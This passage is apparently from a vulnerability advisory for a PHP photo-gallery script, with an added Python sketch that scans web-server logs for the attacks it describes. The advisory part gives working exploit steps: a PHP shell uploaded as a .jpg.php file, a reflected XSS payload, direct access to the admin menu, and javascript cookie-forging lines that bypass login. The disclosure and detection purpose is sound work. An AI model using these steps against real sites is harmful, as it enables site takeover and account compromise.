 I- http://www.example.com/gallery/up.php (To upload Evil)
  
 II- http://www.example.com/gallery/userup/1266607903.jpg.php (To Find Evil)
  
  
 2 - XSS:
  
 http://www.example.com/gallery/index.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
  
 3 - Bypass:
  
 http://www.example.com/gallery/cp/menu.php
  
 Insecure Cookie Handling Vulnerability:
  
 I-   javascript:document.cookie="user_id=userid;path=/";
 II-  javascript:document.cookie="password=password;path=/";
 III- javascript:document.cookie="username=username;path=/";
 IV-  javascript:document.cookie="ok=tmam;path=/";
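
 Detection sketch (added example, not part of the original advisory): a Python scan of web-server access logs for the three request patterns listed above. The log lines, rule names and the admin_ips allowlist are constructed assumptions; cookies are not normally in access logs, so the control-panel rule keys on source IP instead.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in combined log format (not real traffic).
SAMPLE_LOG = '''\
203.0.113.5 - - [10/Mar/2010:10:00:01 +0000] "POST /gallery/up.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Mar/2010:10:00:09 +0000] "GET /gallery/userup/1266607903.jpg.php HTTP/1.1" 200 40 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Mar/2010:10:02:30 +0000] "GET /gallery/index.php/%3E%22%3E%3CScRiPt%3Ealert(1)%3C/ScRiPt%3E HTTP/1.1" 200 900 "-" "Mozilla/5.0"
192.0.2.44 - - [10/Mar/2010:10:05:00 +0000] "GET /gallery/cp/menu.php HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
192.0.2.10 - - [10/Mar/2010:10:06:00 +0000] "GET /gallery/userup/holiday.jpg HTTP/1.1" 200 88211 "-" "Mozilla/5.0"
'''

# client IP, method, request target, status
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')
# Any server-executable extension on a file in the upload directory,
# including double extensions in either order (.jpg.php, .php.jpg).
UPLOAD_SCRIPT = re.compile(
    r'^/gallery/userup/[^?]*\.(php\d?|phtml|phar)(\.|/|\?|$)', re.I)
# Script tags or an attribute break-out sequence in the decoded URL.
MARKUP = re.compile(r'<\s*/?\s*script|">', re.I)
ADMIN_PATH = re.compile(r'^/gallery/cp/', re.I)


def scan(log_text, admin_ips=frozenset()):
    """Return (client_ip, rule, decoded_path) for each suspicious request.

    admin_ips is a hypothetical allowlist of addresses expected to
    reach the control panel.
    """
    findings = []
    for raw in log_text.splitlines():
        m = LINE.match(raw)
        if not m:
            continue  # skip lines that are not in the expected format
        ip, _method, target, status = m.groups()
        path = unquote(target)  # decode %XX so encoded markup is visible
        if UPLOAD_SCRIPT.search(path):
            findings.append((ip, "script-in-upload-dir", path))
        if MARKUP.search(path):
            findings.append((ip, "markup-in-url", path))
        if ADMIN_PATH.match(path) and status == "200" and ip not in admin_ips:
            findings.append((ip, "admin-panel-from-unlisted-ip", path))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```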